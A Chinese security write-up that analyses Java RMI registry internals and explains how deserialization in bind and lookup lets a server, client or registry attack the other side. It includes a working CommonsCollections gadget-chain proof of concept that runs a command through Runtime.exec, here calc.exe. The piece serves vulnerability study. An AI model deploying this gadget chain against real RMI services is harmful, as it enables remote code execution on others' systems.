RMI介绍
Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简化远程接口对象的使用。
接口的两种常见实现方式是:最初使用JRMP(Java Remote Message Protocol,Java远程消息交换协议)实现;此外还可以用与CORBA兼容的方法实现。RMI一般指的是编程接口,也有时候同时包括JRMP和API(应用程序编程接口),而RMI-IIOP则一般指RMI接口接管绝大部分的功能,以支持CORBA的实现。
最初的RMI API设计为通用地支持不同形式的接口实现。后来,CORBA增加了传值(pass by value)功能,以实现RMI接口。然而RMI-IIOP和JRMP实现的接口并不完全一致
RMI由三部分组成
客户端(java.rmi)
服务端(java.rmi.server)
注册中心(java.rmi.register)
一个rmi例子
import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.LazyMap;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.rmi.Remote;import java.rmi.registry.LocateRegistry;import java.rmi.registry.Registry;import java.util.HashMap;import java.util.Map;public class Rmiregister {public static void main(String[] args) throws Exception{Transformer[] fakertransformers=new Transformer[]{new ConstantTransformer(new Class[0])};Transformer[] transformers = new Transformer[] {new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[] { String.class,Class[].class }, newObject[] { "getRuntime",new Class[0] }),new InvokerTransformer("invoke", new Class[] { Object.class,Object[].class }, newObject[] { null, new Object[0] }),new InvokerTransformer("exec", new Class[] { String.class },new String[] { "cmd.exe /c calc.exe" }),};Transformer transformerChain = new ChainedTransformer(fakertransformers);HashMap h=new HashMap();LazyMap lazy_map= (LazyMap) LazyMap.decorate(h,transformerChain);Constructor AnnotationInvocationHandler_constructor_invoke=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);AnnotationInvocationHandler_constructor_invoke.setAccessible(true);InvocationHandler AnnotationInvocationHandler_constructor_in= (InvocationHandler) AnnotationInvocationHandler_constructor_invoke.newInstance(Override.class,lazy_map);Field f=transformerChain.getClass().getDeclaredField("iTransformers");f.setAccessible(true);f.set(transformerChain,transformers);Map proxy= (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Map.class},AnnotationInvocationHandler_constructor_in);Constructor AnnotationInvocationHandler_constructor=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);AnnotationInvocationHandler_constructor.setAccessible(true);InvocationHandler AnnotationInvocationHandler_constructor_payload = (InvocationHandler) AnnotationInvocationHandler_constructor.newInstance(Override.class,proxy);Remote remote=Remote.class.cast(Proxy.newProxyInstance(rmiserial.class.getClassLoader(),new Class[]{Remote.class},AnnotationInvocationHandler_constructor_payload));try {Registry registry = LocateRegistry.createRegistry(4096);registry.bind("demo",remote);}catch (Exception e){System.out.println(e);}while(true);}}
这里在createRegistry打断点 分析执行流程
public static Registry createRegistry(int port) throws RemoteException {return new RegistryImpl(port);}
跟入RegistryImpl
public RegistryImpl(int var1) throws RemoteException {LiveRef var2 = new LiveRef(id, var1); //var1是端口号 封装c横liveref对象this.setup(new UnicastServerRef(var2));}
跟入setup
private void setup(UnicastServerRef var1) throws RemoteException {this.ref = var1;var1.exportObject(this, (Object)null, true); //这里第一个参数是RegistryImpl本身}
exportObject
public Remote exportObject(Remote var1, Object var2, boolean var3) throws RemoteException {Class var4 = var1.getClass(); //RegistryImplRemote var5;try {var5 = Util.createProxy(var4, this.getClientRef(), this.forceStubUse); //跟入} catch (IllegalArgumentException var7) {throw new ExportException("remote object implements illegal remote interface", var7);}if (var5 instanceof RemoteStub) {this.setSkeleton(var1);}Target var6 = new Target(var1, this, var5, this.ref.getObjID(), var3);this.ref.exportObject(var6);this.hashToMethod_Map = (Map)hashToMethod_Maps.get(var4);return var5;}
createProxy
public static Remote createProxy(Class var0, RemoteRef var1, boolean var2) throws StubNotFoundException {Class var3;try {var3 = getRemoteClass(var0);} catch (ClassNotFoundException var9) {throw new StubNotFoundException("object does not implement a remote interface: " + var0.getName());}if (var2 || !ignoreStubClasses && stubClassExists(var3)) {return createStub(var3, var1); //跟入} else {ClassLoader var4 = var0.getClassLoader();Class[] var5 = getRemoteInterfaces(var0);RemoteObjectInvocationHandler var6 = new RemoteObjectInvocationHandler(var1);try {return (Remote)Proxy.newProxyInstance(var4, var5, var6);} catch (IllegalArgumentException var8) {throw new StubNotFoundException("unable to create proxy", var8);}}}
跟入createStub
private static RemoteStub createStub(Class var0, RemoteRef var1) throws StubNotFoundException {String var2 = var0.getName() + "_Stub"; //这里是RegistryImpl_Stubtry {Class var3 = Class.forName(var2, false, var0.getClassLoader());Constructor var4 = var3.getConstructor(stubConsParamTypes);return (RemoteStub)var4.newInstance(var1);} catch (ClassNotFoundException var5) {throw new StubNotFoundException("Stub class not found: " + var2, var5);} catch (NoSuchMethodException var6) {throw new StubNotFoundException("Stub class missing constructor: " + var2, var6);} catch (InstantiationException var7) {throw new StubNotFoundException("Can't create instance of stub class: " + var2, var7);} catch (IllegalAccessException var8) {throw new StubNotFoundException("Stub class constructor not public: " + var2, var8);} catch (InvocationTargetException var9) {throw new StubNotFoundException("Exception creating instance of stub class: " + var2, var9);} catch (ClassCastException var10) {throw new StubNotFoundException("Stub class not instance of RemoteStub: " + var2, var10);}}
createStub的作用就是反射创建,然后返回RegistryImpl_Stub方法,所以上面var5就是一个RegistryImpl_Stub的实例
继续跟入exportObject的后半段
if (var5 instanceof RemoteStub) {this.setSkeleton(var1);}Target var6 = new Target(var1, this, var5, this.ref.getObjID(), var3);this.ref.exportObject(var6);this.hashToMethod_Map = (Map)hashToMethod_Maps.get(var4);return var5;}
跟入this.ref.exportObject(var6);
public void exportObject(Target var1) throws RemoteException {synchronized(this) {this.listen();++this.exportCount;}boolean var2 = false;boolean var12 = false;try {var12 = true;super.exportObject(var1);var2 = true;var12 = false;} finally {if (var12) {if (!var2) {synchronized(this) {this.decrementExportCount();}}}}if (!var2) {synchronized(this) {this.decrementExportCount();}}}
listen
private void listen() throws RemoteException {assert Thread.holdsLock(this);TCPEndpoint var1 = this.getEndpoint();int var2 = var1.getPort();if (this.server == null) {if (tcpLog.isLoggable(Log.BRIEF)) {tcpLog.log(Log.BRIEF, "(port " + var2 + ") create server socket");}try {this.server = var1.newServerSocket();Thread var3 = (Thread)AccessController.doPrivileged(new NewThreadAction(new TCPTransport.AcceptLoop(this.server), "TCP Accept-" + var2, true));var3.start();} catch (BindException var4) {throw new ExportException("Port already in use: " + var2, var4);} catch (IOException var5) {throw new ExportException("Listen failed on port: " + var2, var5);}} else {SecurityManager var6 = System.getSecurityManager();if (var6 != null) {var6.checkListen(var2);}}}
listen主要做的就是开始监听
总结
createRegistry主要做了返回了一个RegistryImpl_Stub对象,并且跟入传入的端口开始socket监听
Registry registry = LocateRegistry.createRegistry(4096);registry.bind("demo",remote);
在Registryimpl_stub的bind,看对象如何绑定
public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {try {RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);try {ObjectOutput var4 = var3.getOutputStream();var4.writeObject(var1);var4.writeObject(var2);} catch (IOException var5) {throw new MarshalException("error marshalling arguments", var5);}super.ref.invoke(var3);super.ref.done(var3);} catch (RuntimeException var6) {throw var6;} catch (RemoteException var7) {throw var7;} catch (AlreadyBoundException var8) {throw var8;} catch (Exception var9) {throw new UnexpectedException("undeclared checked exception", var9);}}
其中var1为对象名称,var2才是对象本体,可以看到这把把对象序列化了。
这里ref是UnicastServerRef,调用的是UnicastServerRef父类的newcall
跟入这个newcall
public RemoteCall newCall(RemoteObject var1, Operation[] var2, int var3, long var4) throws RemoteException {clientRefLog.log(Log.BRIEF, "get connection");Connection var6 = this.ref.getChannel().newConnection(); //获取l连接try {clientRefLog.log(Log.VERBOSE, "create call context");if (clientCallLog.isLoggable(Log.VERBOSE)) {this.logClientCall(var1, var2[var3]);}StreamRemoteCall var7 = new StreamRemoteCall(var6, this.ref.getObjID(), var3, var4);try {this.marshalCustomCallData(var7.getOutputStream());} catch (IOException var9) {throw new MarshalException("error marshaling custom call data");}return var7;} catch (RemoteException var10) {this.ref.getChannel().free(var6, false);throw var10;}}
var1是RegistryImpl_stub对象
var2忘了
var3是0
这里最终返回的是StreamRemoteCall对象 跟入
StreamRemoteCall
public StreamRemoteCall(Connection var1, ObjID var2, int var3, long var4) throws RemoteException {try {this.conn = var1;Transport.transportLog.log(Log.VERBOSE, "write remote call header...");this.conn.getOutputStream().write(80);this.getOutputStream();var2.write(this.out);this.out.writeInt(var3); //写入0this.out.writeLong(var4); //写入了hash} catch (IOException var7) {throw new MarshalException("Error marshaling call header", var7);}}
注意这个getOutputstream
private ObjectOutput getOutputStream(boolean var1) throws IOException {if (this.out == null) {Transport.transportLog.log(Log.VERBOSE, "getting output stream");this.out = new ConnectionOutputStream(this.conn, var1);}return this.out;}
最终返回的是StreamRemoteCall对象
public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {try {//StreamRemoteCallRemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);try {ObjectOutput var4 = var3.getOutputStream(); //这里返回outvar4.writeObject(var1); //写入bind的名字var4.writeObject(var2); //写入bind对应名字的对象} catch (IOException var5) {throw new MarshalException("error marshalling arguments", var5);}super.ref.invoke(var3);super.ref.done(var3);} catch (RuntimeException var6) {throw var6;} catch (RemoteException var7) {throw var7;} catch (AlreadyBoundException var8) {throw var8;} catch (Exception var9) {throw new UnexpectedException("undeclared checked exception", var9);}}
跟入上图的invoke
Unicastrefpublic void invoke(RemoteCall var1) throws Exception {try {clientRefLog.log(Log.VERBOSE, "execute call");var1.executeCall(); //这里调用的是streamremotecall的executecall} catch (RemoteException var3) {clientRefLog.log(Log.BRIEF, "exception: ", var3);this.free(var1, false);throw var3;} catch (Error var4) {clientRefLog.log(Log.BRIEF, "error: ", var4);this.free(var1, false);throw var4;} catch (RuntimeException var5) {clientRefLog.log(Log.BRIEF, "exception: ", var5);this.free(var1, false);throw var5;} catch (Exception var6) {clientRefLog.log(Log.BRIEF, "exception: ", var6);this.free(var1, true);throw var6;}}
跟入executeCall
public void executeCall() throws Exception {DGCAckHandler var2 = null;byte var1;try {if (this.out != null) {var2 = this.out.getDGCAckHandler();}this.releaseOutputStream();DataInputStream var3 = new DataInputStream(this.conn.getInputStream());byte var4 = var3.readByte();if (var4 != 81) {if (Transport.transportLog.isLoggable(Log.BRIEF)) {Transport.transportLog.log(Log.BRIEF, "transport return code invalid: " + var4);}throw new UnmarshalException("Transport return code invalid");}this.getInputStream();var1 = this.in.readByte();this.in.readID();} catch (UnmarshalException var11) {throw var11;} catch (IOException var12) {throw new UnmarshalException("Error unmarshaling return header", var12);} finally {if (var2 != null) {var2.release();}}switch(var1) {case 1:return;case 2:Object var14;try {var14 = this.in.readObject();} catch (Exception var10) {throw new UnmarshalException("Error unmarshaling return", var10);}if (!(var14 instanceof Exception)) {throw new UnmarshalException("Return type not Exception");} else {this.exceptionReceivedFromServer((Exception)var14);}default:if (Transport.transportLog.isLoggable(Log.BRIEF)) {Transport.transportLog.log(Log.BRIEF, "return code invalid: " + var1);}throw new UnmarshalException("Return code invalid");}}
总结:反射创建registryimpl_stub,调用里面的bind方法,把对象序列化后写入,通过executeCall进行请求分发。通过tcp发送消息到服务器。服务器端上面提到有一个监听,在 TCP 协议层发起 socket 监听,并采用多线程循环接收请求:TCPTransport.AcceptLoop(this.server),线程池来处理socket接收到的请求。通过一系列操作获取target对象,这个target对象已经是服务器对象。借由派发器Dispatcher,传入参数服务实现和请求对象remotecall,将请求派发给服务端那个真正提供服务的RegistryImpl 的 lookUp()方法。
lookup分析
public Remote lookup(String var1) throws AccessException, NotBoundException, RemoteException {try {//这里var2同样是Streamremotecall对象RemoteCall var2 = super.ref.newCall(this, operations, 2, 4905912898345647071L);try {ObjectOutput var3 = var2.getOutputStream();var3.writeObject(var1);} catch (IOException var18) {throw new MarshalException("error marshalling arguments", var18);}super.ref.invoke(var2); //调用executecallRemote var23;try {ObjectInput var6 = var2.getInputStream(); //获取registr的输入流var23 = (Remote)var6.readObject(); //反序列化} catch (IOException var15) {throw new UnmarshalException("error unmarshalling return", var15);} catch (ClassNotFoundException var16) {throw new UnmarshalException("error unmarshalling return", var16);} finally {super.ref.done(var2);}return var23;} catch (RuntimeException var19) {throw var19;} catch (RemoteException var20) {throw var20;} catch (NotBoundException var21) {throw var21;} catch (Exception var22) {throw new UnexpectedException("undeclared checked exception", var22);}}
可以看到这里可以lookup获取registry的输入流后readObject,说明这里可以通过注册中心打客户端
为什么服务端bind能打注册中心
参考一些文章,得知在exportObject的时候会给this.skel赋值一个registryimpl_skel对象
public Remote exportObject(Remote var1, Object var2, boolean var3) throws RemoteException {Class var4 = var1.getClass();Remote var5;try {var5 = Util.createProxy(var4, this.getClientRef(), this.forceStubUse);} catch (IllegalArgumentException var7) {throw new ExportException("remote object implements illegal remote interface", var7);}if (var5 instanceof RemoteStub) {this.setSkeleton(var1); //这里}public void setSkeleton(Remote var1) throws RemoteException {if (!withoutSkeletons.containsKey(var1.getClass())) {try {this.skel = Util.createSkeleton(var1);} catch (SkeletonNotFoundException var3) {withoutSkeletons.put(var1.getClass(), (Object)null);}}}
registryimpl_skel对象的dispatch
public void dispatch(Remote var1, RemoteCall var2, int var3, long var4) throws Exception {if (var4 != 4905912898345647071L) {throw new SkeletonMismatchException("interface hash mismatch");} else {RegistryImpl var6 = (RegistryImpl)var1;String var7;Remote var8;ObjectInput var10;ObjectInput var11;switch(var3) {case 0:try {var11 = var2.getInputStream();var7 = (String)var11.readObject();var8 = (Remote)var11.readObject();} catch (IOException var94) {throw new UnmarshalException("error unmarshalling arguments", var94);} catch (ClassNotFoundException var95) {throw new UnmarshalException("error unmarshalling arguments", var95);} finally {var2.releaseInputStream();}var6.bind(var7, var8);
这里的var3是在registryimpl_stub中的bind设置
public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {try {RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);try {
可以看到设置为0
所以上面case 0的时候,会对rmi服务端bind的时候发送过来的序列化数据进行反序列化,这里就导致服务端打注册中心
客户端打注册中心
看到lookup
public Remote lookup(String var1) throws AccessException, NotBoundException, RemoteException {try {RemoteCall var2 = super.ref.newCall(this, operations, 2, 4905912898345647071L);try {ObjectOutput var3 = var2.getOutputStream();var3.writeObject(var1); //这里对lookup传过来的string进行序列化了} catch (IOException var18) {throw new MarshalException("error marshalling arguments", var18);}super.ref.invoke(var2);
这里设置为2,对应case 里面的2分支
public void dispatch(Remote var1, RemoteCall var2, int var3, long var4) throws Exception {if (var4 != 4905912898345647071L) {throw new SkeletonMismatchException("interface hash mismatch");} else {RegistryImpl var6 = (RegistryImpl)var1;String var7;Remote var8;ObjectInput var10;ObjectInput var11;switch(var3) {case 0:try {var11 = var2.getInputStream();var7 = (String)var11.readObject();var8 = (Remote)var11.readObject();} catch (IOException var94) {throw new UnmarshalException("error unmarshalling arguments", var94);} catch (ClassNotFoundException var95) {throw new UnmarshalException("error unmarshalling arguments", var95);} finally {var2.releaseInputStream();}var6.bind(var7, var8);try {var2.getResultStream(true);break;} catch (IOException var93) {throw new MarshalException("error marshalling return", var93);}case 1:var2.releaseInputStream();String[] var97 = var6.list();try {ObjectOutput var98 = var2.getResultStream(true);var98.writeObject(var97);break;} catch (IOException var92) {throw new MarshalException("error marshalling return", var92);}case 2:try {var10 = var2.getInputStream();var7 = (String)var10.readObject(); //对string进行反序列化} catch (IOException var89) {throw new UnmarshalException("error unmarshalling arguments", var89);} catch (ClassNotFoundException var90) {throw new UnmarshalException("error unmarshalling arguments", var90);} finally {var2.releaseInputStream();}var8 = var6.lookup(var7);try {ObjectOutput var9 = var2.getResultStream(true);var9.writeObject(var8);break;} catch (IOException var88) {throw new MarshalException("error marshalling return", var88);}
用一下threedr3am师傅原图

参考链接
https://xz.aliyun.com/t/7079
https://xz.aliyun.com/t/7264
https://paper.seebug.org/1420/




